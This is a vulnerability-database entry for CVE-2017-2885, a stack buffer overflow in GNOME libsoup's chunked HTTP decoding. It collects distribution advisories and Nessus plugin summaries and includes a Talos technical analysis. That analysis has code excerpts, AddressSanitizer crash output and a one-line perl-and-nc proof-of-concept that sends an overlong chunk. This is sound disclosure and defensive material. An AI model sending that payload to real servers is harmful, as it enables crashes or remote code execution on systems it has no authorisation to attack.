Vulnerabilities > CVE-2017-2885 - Out-of-bounds Write vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
An exploitable stack based buffer overflow vulnerability exists in the GNOME libsoup 2.58. A specially crafted HTTP request can cause a stack overflow resulting in remote code execution. An attacker can send a special HTTP request to the vulnerable server to trigger this vulnerability.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 | |
| OS | 2 | |
| OS | 7 |
Common Weakness Enumeration (CWE)
Nessus
NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_8E7BBDDD833811E7867FB499BAEBFEAF.NASL description Tobias Mueller reports : libsoup is susceptible to a stack based buffer overflow attack when using chunked encoding. Regardless of libsoup being used as a server or client. last seen 2020-06-01 modified 2020-06-02 plugin id 102553 published 2017-08-18 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102553 title FreeBSD : libsoup -- stack based buffer overflow (8e7bbddd-8338-11e7-867f-b499baebfeaf) NASL family SuSE Local Security Checks NASL id SUSE_SU-2017-2130-1.NASL description This update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 102414 published 2017-08-11 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102414 title SUSE SLES12 Security Update : libsoup (SUSE-SU-2017:2130-1) NASL family PhotonOS Local Security Checks NASL id PHOTONOS_PHSA-2018-1_0-0149.NASL description An update of {'openssl', 'libsoup'} packages of Photon OS has been released. last seen 2019-02-21 modified 2019-02-07 plugin id 111275 published 2018-07-24 reporter Tenable source https://www.tenable.com/plugins/index.php?view=single&id=111275 title Photon OS 1.0 : openssl / libsoup (PhotonOS-PHSA-2018-1.0-0149) (deprecated) NASL family Scientific Linux Local Security Checks NASL id SL_20170815_LIBSOUP_ON_SL7_X.NASL description Security Fix(es) : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) last seen 2020-03-18 modified 2017-08-22 plugin id 102670 published 2017-08-22 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102670 title Scientific Linux Security Update : libsoup on SL7.x x86_64 (20170815) NASL family SuSE Local Security Checks NASL id SUSE_SU-2018-2204-2.NASL description This update for libsoup fixes the following issues : Security issue fixed : CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes: bsc#1086036: translation-update-upstream commented out for Leap Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-03-18 modified 2019-01-09 plugin id 121042 published 2019-01-09 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/121042 title SUSE SLES12 Security Update : libsoup (SUSE-SU-2018:2204-2) NASL family PhotonOS Local Security Checks NASL id PHOTONOS_PHSA-2018-2_0-0060.NASL description An update of {'libtiff', 'glibc', 'libsoup'} packages of Photon OS has been released. last seen 2019-02-21 modified 2019-02-07 plugin id 111309 published 2018-07-24 reporter Tenable source https://www.tenable.com/plugins/index.php?view=single&id=111309 title Photon OS 2.0 : libtiff / glibc / libsoup (PhotonOS-PHSA-2018-2.0-0060) (deprecated) NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-3383-1.NASL description Aleksandar Nikolic discovered a stack based buffer overflow when handling chunked encoding. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 102417 published 2017-08-11 reporter Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102417 title Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : libsoup2.4 vulnerability (USN-3383-1) NASL family PhotonOS Local Security Checks NASL id PHOTONOS_PHSA-2018-2_0-0060_LIBTIFF.NASL description An update of the libtiff package has been released. last seen 2020-03-17 modified 2019-02-07 plugin id 121958 published 2019-02-07 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/121958 title Photon OS 2.0: Libtiff PHSA-2018-2.0-0060 NASL family Slackware Local Security Checks NASL id SLACKWARE_SSA_2017-223-02.NASL description New libsoup packages are available for Slackware 14.1, 14.2, and -current to fix a security issue. last seen 2020-06-01 modified 2020-06-02 plugin id 102433 published 2017-08-14 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102433 title Slackware 14.1 / 14.2 / current : libsoup (SSA:2017-223-02) NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201709-26.NASL description The remote host is affected by the vulnerability described in GLSA-201709-26 (libsoup: Arbitrary remote code execution) A stack based buffer overflow vulnerability was discovered in libsoup. Impact : A remote attacker, by using specially crafted HTTP requests, could execute arbitrary code with the privileges of the process. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 103485 published 2017-09-27 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103485 title GLSA-201709-26 : libsoup: Arbitrary remote code execution NASL family SuSE Local Security Checks NASL id OPENSUSE-2018-856.NASL description This update for libsoup fixes the following issues : Security issue fixed : - CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). - CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes : - bsc#1086036: translation-update-upstream commented out for Leap This update was imported from the SUSE:SLE-12-SP2:Update update project. last seen 2020-06-05 modified 2018-08-10 plugin id 111637 published 2018-08-10 reporter This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/111637 title openSUSE Security Update : libsoup (openSUSE-2018-856) NASL family Fedora Local Security Checks NASL id FEDORA_2017-1F4C82D73E.NASL description Security fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-22 plugin id 102631 published 2017-08-22 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102631 title Fedora 26 : mingw-libsoup (2017-1f4c82d73e) NASL family PhotonOS Local Security Checks NASL id PHOTONOS_PHSA-2018-2_0-0060_GLIBC.NASL description An update of the glibc package has been released. last seen 2020-03-17 modified 2019-02-07 plugin id 121956 published 2019-02-07 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/121956 title Photon OS 2.0: Glibc PHSA-2018-2.0-0060 NASL family PhotonOS Local Security Checks NASL id PHOTONOS_PHSA-2018-1_0-0149_LIBSOUP.NASL description An update of the libsoup package has been released. last seen 2020-03-17 modified 2019-02-07 plugin id 121847 published 2019-02-07 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/121847 title Photon OS 1.0: Libsoup PHSA-2018-1.0-0149 NASL family PhotonOS Local Security Checks NASL id PHOTONOS_PHSA-2018-2_0-0060_LIBSOUP.NASL description An update of the libsoup package has been released. last seen 2020-03-17 modified 2019-02-07 plugin id 121957 published 2019-02-07 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/121957 title Photon OS 2.0: Libsoup PHSA-2018-2.0-0060 NASL family Fedora Local Security Checks NASL id FEDORA_2017-B0EC173BD1.NASL description Security fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-14 plugin id 102460 published 2017-08-14 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102460 title Fedora 26 : libsoup (2017-b0ec173bd1) NASL family SuSE Local Security Checks NASL id SUSE_SU-2018-2204-1.NASL description This update for libsoup fixes the following issues: Security issue fixed : - CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). - CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes : - bsc#1086036: translation-update-upstream commented out for Leap Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 111574 published 2018-08-07 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/111574 title SUSE SLED12 / SLES12 Security Update : libsoup (SUSE-SU-2018:2204-1) NASL family Huawei Local Security Checks NASL id EULEROS_SA-2019-1392.NASL description According to the versions of the libsoup package installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities : - The get_cookies function in soup-cookie-jar.c in libsoup 2.63.2 allows attackers to have unspecified impact via an empty hostname.(CVE-2018-12910) - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality.(CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 124895 published 2019-05-14 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/124895 title EulerOS Virtualization for ARM 64 3.0.1.0 : libsoup (EulerOS-SA-2019-1392) NASL family Huawei Local Security Checks NASL id EULEROS_SA-2017-1210.NASL description According to the version of the libsoup packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-05-06 modified 2017-09-11 plugin id 103068 published 2017-09-11 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103068 title EulerOS 2.0 SP2 : libsoup (EulerOS-SA-2017-1210) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-2459.NASL description An update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 102412 published 2017-08-11 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102412 title RHEL 7 : libsoup (RHSA-2017:2459) NASL family PhotonOS Local Security Checks NASL id PHOTONOS_PHSA-2018-1_0-0149_OPENSSL.NASL description An update of the openssl package has been released. last seen 2020-03-17 modified 2019-02-07 plugin id 121848 published 2019-02-07 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/121848 title Photon OS 1.0: Openssl PHSA-2018-1.0-0149 NASL family SuSE Local Security Checks NASL id SUSE_SU-2017-2129-1.NASL description This update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 102413 published 2017-08-11 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102413 title SUSE SLED12 / SLES12 Security Update : libsoup (SUSE-SU-2017:2129-1) NASL family CentOS Local Security Checks NASL id CENTOS_RHSA-2017-2459.NASL description An update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 102764 published 2017-08-25 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102764 title CentOS 7 : libsoup (CESA-2017:2459) NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-914.NASL description This update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). This update was imported from the SUSE:SLE-12-SP2:Update update project. last seen 2020-06-05 modified 2017-08-14 plugin id 102468 published 2017-08-14 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102468 title openSUSE Security Update : libsoup (openSUSE-2017-914) NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2017-2459.NASL description From Red Hat Security Advisory 2017:2459 : An update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 102409 published 2017-08-11 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102409 title Oracle Linux 7 : libsoup (ELSA-2017-2459) NASL family Huawei Local Security Checks NASL id EULEROS_SA-2017-1209.NASL description According to the version of the libsoup packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-05-06 modified 2017-09-11 plugin id 103067 published 2017-09-11 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103067 title EulerOS 2.0 SP1 : libsoup (EulerOS-SA-2017-1209) NASL family Fedora Local Security Checks NASL id FEDORA_2017-872A0A9A85.NASL description Security fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-14 plugin id 102457 published 2017-08-14 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102457 title Fedora 25 : libsoup (2017-872a0a9a85) NASL family Fedora Local Security Checks NASL id FEDORA_2017-C9D8011D69.NASL description Security fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-24 plugin id 102721 published 2017-08-24 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102721 title Fedora 25 : mingw-libsoup (2017-c9d8011d69) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-3929.NASL description Aleksandar Nikolic of Cisco Talos discovered a stack-based buffer overflow vulnerability in libsoup2.4, a HTTP library implementation in C. A remote attacker can take advantage of this flaw by sending a specially crafted HTTP request to cause an application using the libsoup2.4 library to crash (denial of service), or potentially execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 102370 published 2017-08-11 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102370 title Debian DSA-3929-1 : libsoup2.4 - security update
Redhat
| advisories |
| ||||||||||||||||||||||||||||||||||||||||||||||||||||
| rpms |
|
Seebug
| bulletinFamily | exploit |
| description | ### Summary An exploitable stack based buffer overflow vulnerability exists in the GNOME libsoup 2.58. A specially crafted HTTP request can cause a stack overflow resulting in remote code execution. An attacker can send a special HTTP request to the vulnerable server to trigger this vulnerability. ### Tested Versions GNOME libsoup 2.58 ### Product URLs https://wiki.gnome.org/action/show/Projects/libsoup ### CVSSv3 Score 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-121: Stack-based Buffer Overflow ### Details GNOME libsoup is a library implementing client and server side code for dealing with HTTP requests and responses. It is used to implement custom web servers or clients. Usually it is used embedded in other applications such as media streaming servers for basic web server functionality. It can also be used standalone and embedded in hardware devices. When processing an HTTP request which contains chunk encoded data, an improper bounds checking can lead to large memory copy operation which can overflow a statically sized buffer on the stack. Buffer that is being overflown is located in function `soup_body_input_stream_read_chunked` in file libsoup/soup-body-input-stream.c: ``` static gssize soup_body_input_stream_read_chunked (SoupBodyInputStream *bistream, void *buffer, gsize count, gboolean blocking, GCancellable *cancellable, GError **error) SoupFilterInputStream *fstream = SOUP_FILTER_INPUT_STREAM (bistream->priv->base_stream); char metabuf[128]; [1] gssize nread; gboolean got_line; ``` The buffer is allocated on the stack at [1]. While further processing the body of a chunk-encoded HTTP request, function `soup_filter_input_stream_read_line` is called: ``` case SOUP_BODY_INPUT_STREAM_STATE_CHUNK_END: nread = soup_filter_input_stream_read_line ( SOUP_FILTER_INPUT_STREAM (bistream->priv->base_stream), metabuf, sizeof (metabuf), blocking, &got_line, cancellable, error); ``` In the above code, we can see `metabuf` and it’s length being passed to the `soup_filter_input_stream_read_line` function which is just a wrapper around `soup_filter_input_stream_read_until` being called with new line as delimiter: ``` gssize soup_filter_input_stream_read_line (SoupFilterInputStream *fstream, void *buffer, gsize length, gboolean blocking, gboolean *got_line, GCancellable *cancellable, GError **error) return soup_filter_input_stream_read_until (fstream, buffer, length, "\n", 1, blocking, TRUE, got_line, cancellable, error); ``` Function `soup_filter_input_stream_read_until` does the actual reading from the input stream into the buffer. ``` /* Scan for the boundary */ end = buf + fstream->priv->buf->len; [2] if (!eof) end -= boundary_length; for (p = buf; p <= end; p++) { [3] if (*p == *(guint8*)boundary && !memcmp (p, boundary, boundary_length)) { [4] if (include_boundary) p += boundary_length; *got_boundary = TRUE; break; if (!*got_boundary && fstream->priv->buf->len < length && !eof) goto fill_buffer; /* Return everything up to 'p' (which is either just after the boundary if * include_boundary is TRUE, just before the boundary if include_boundary is * FALSE, @boundary_len - 1 bytes before the end of the buffer, or end-of- * file). */ return read_from_buf (fstream, buffer, p - buf); [5] ``` In the above code, at [2] a pointer to the end of the stream data is calculated, at [3] it is used as an end condition in a for loop which is looking for a set delimiter (variable boundary, a newline character in this case) at [4]. Pointer p is being incremented in the loop until newline is found. Finally, at [5], function read_from_buf is called with input stream as source, buffer as destination and offset to newline character as length. No check to make sure the buffer is big enough is performed anywhere. In the function read_from_buf a memcpy call can thus lead to a buffer overflow: ``` static gssize read_from_buf (SoupFilterInputStream *fstream, gpointer buffer, gsize count) GByteArray *buf = fstream->priv->buf; if (buf->len < count) count = buf->len; memcpy (buffer, buf->data, count); ``` To trigger this vulnerability, a simple HTTP request like the following is enough: GET / HTTP/1.0 Transfer-Encoding: chunked When parsing this request, the first chunk will be of size 1, and then the parser proceeds to scan the overly long series of A characters for a new line. A string longer than 128 characters will overflow the buffer. This can be abused in order to crash the server or achieve remote code execution in the context of the server. When parsing this request, the first chunk will be of size 1, and then the parser proceeds to scan the overly long series of A characters for a new line. A string longer than 128 characters will overflow the buffer. This can be abused in order to crash the server or achieve remote code execution in the context of the server. ### Crash Information ``` Address Sanitizer output: Listening on http://0.0.0.0:12323/ Listening on http://[::]:12323/ Waiting for requests... ================================================================= ==119749==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffb280 at pc 0x0000004a3bfd bp 0x7fffffffb010 sp 0x7fffffffa7c0 WRITE of size 151 at 0x7fffffffb280 thread T0 #0 0x4a3bfc in __asan_memcpy ??:? #1 0x4a3bfc in ?? ??:0 #2 0x7ffff7962126 in read_from_buf /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:59 #3 0x7ffff7962126 in soup_filter_input_stream_read_until /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:278 #4 0x7ffff7962126 in ?? ??:0 #5 0x7ffff7961475 in soup_filter_input_stream_read_line /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:183 #6 0x7ffff7961475 in ?? ??:0 #7 0x7ffff791fd45 in soup_body_input_stream_read_chunked /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:194 #8 0x7ffff791fd45 in read_internal /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:249 #9 0x7ffff791fd45 in ?? ??:0 #10 0x7ffff79966b0 in io_read /home/user/libsoup/libsoup/libsoup/soup-message-io.c:762 #11 0x7ffff79966b0 in ?? ??:0 #12 0x7ffff79901b5 in io_run_until /home/user/libsoup/libsoup/libsoup/soup-message-io.c:982 #13 0x7ffff79901b5 in ?? ??:0 #14 0x7ffff7993ee3 in io_run /home/user/libsoup/libsoup/libsoup/soup-message-io.c:1053 #15 0x7ffff7993ee3 in ?? ??:0 #16 0x7ffff7999939 in soup_message_read_request /home/user/libsoup/libsoup/libsoup/soup-message-server-io.c:304 #17 0x7ffff7999939 in ?? ??:0 #18 0x7ffff71a00a6 in g_cclosure_marshal_VOID__OBJECTv ??:? #19 0x7ffff71a00a6 in ?? ??:0 #20 0x7ffff719d1d3 in g_closure_invoke ??:? #21 0x7ffff719d1d3 in ?? ??:0 #22 0x7ffff71b79a5 in g_signal_emit_valist ??:? #23 0x7ffff71b79a5 in ?? ??:0 #24 0x7ffff71b808e in g_signal_emit ??:? #25 0x7ffff71b808e in ?? ??:0 #26 0x7ffff79e894a in listen_watch /home/user/libsoup/libsoup/libsoup/soup-socket.c:1237 #27 0x7ffff79e894a in ?? ??:0 #28 0x7ffff6ec6049 in g_main_context_dispatch ??:? #29 0x7ffff6ec6049 in ?? ??:0 #30 0x7ffff6ec63ef in g_main_context_dispatch ??:? #31 0x7ffff6ec63ef in ?? ??:0 #32 0x7ffff6ec6711 in g_main_loop_run ??:? #33 0x7ffff6ec6711 in ?? ??:0 #34 0x4eb8cc in main /home/user/libsoup/libsoup/examples/simple-httpd.c:360 #35 0x4eb8cc in ?? ??:0 #36 0x7ffff5f8a82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291 #37 0x7ffff5f8a82f in ?? ??:0 #38 0x419dc8 in _start ??:? #39 0x419dc8 in ?? ??:0 ``` Address 0x7fffffffb280 is located in stack of thread T0 at offset 160 in frame ``` #0 0x7ffff791f8af in read_internal /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:237 #1 0x7ffff791f8af in ?? ??:0 This frame has 2 object(s): [32, 160) 'metabuf.i' [192, 196) 'got_line.i' <== Memory access at offset 160 partially underflows this variable ``` HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext ``` (longjmp and C++ exceptions *are* supported) ``` SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/user/libsoup/libsoup/examples/.libs/simple-httpd+0x4a3bfc) Shadow bytes around the buggy address: ``` 0x10007fff7600: 00 00 00 00 f1 f1 f1 f1 00 f3 f3 f3 00 00 00 00 0x10007fff7610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7630: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x10007fff7640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff7650:[f2]f2 f2 f2 04 f3 f3 f3 00 00 00 00 00 00 00 00 0x10007fff7660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7670: 00 00 00 00 ca ca ca ca 00 00 00 00 00 00 00 00 0x10007fff7680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff76a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ``` Shadow byte legend (one shadow byte represents 8 application bytes): ``` Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==119749==ABORTING ``` ### Exploit Proof-of-Concept ``` perl -e 'print "GET / HTTP/1.0\r\nTransfer-Encoding: chunked\r\n\r\n1\r\n" . "A"x150 . "\r\n \r\n"' | nc ``` ### Timeline * 2017-08-02 - Vendor Disclosure * 2017-08-10 - Public Release ### CREDIT * Discovered by Aleksandar Nikolic of Cisco Talos. |
| id | SSV:96451 |
| last seen | 2017-11-19 |
| modified | 2017-09-13 |
| published | 2017-09-13 |
| reporter | Root |
| title | GNOME libsoup HTTP Chunked Encoding Remote Code Execution Vulnerability(CVE-2017-2885) |
Talos
| id | TALOS-2017-0392 |
| last seen | 2019-05-29 |
| published | 2017-08-10 |
| reporter | Talos Intelligence |
| source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0392 |
| title | GNOME libsoup HTTP Chunked Encoding Remote Code Execution Vulnerability |
References
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0392
- https://www.debian.org/security/2017/dsa-3929
- https://access.redhat.com/errata/RHSA-2017:2459
- http://www.securityfocus.com/bid/100258
- http://seclists.org/fulldisclosure/2020/Dec/3
- http://packetstormsecurity.com/files/160388/ProCaster-LE-32F430-GStreamer-souphttpsrc-libsoup-2.51.3-Stack-Overflow.html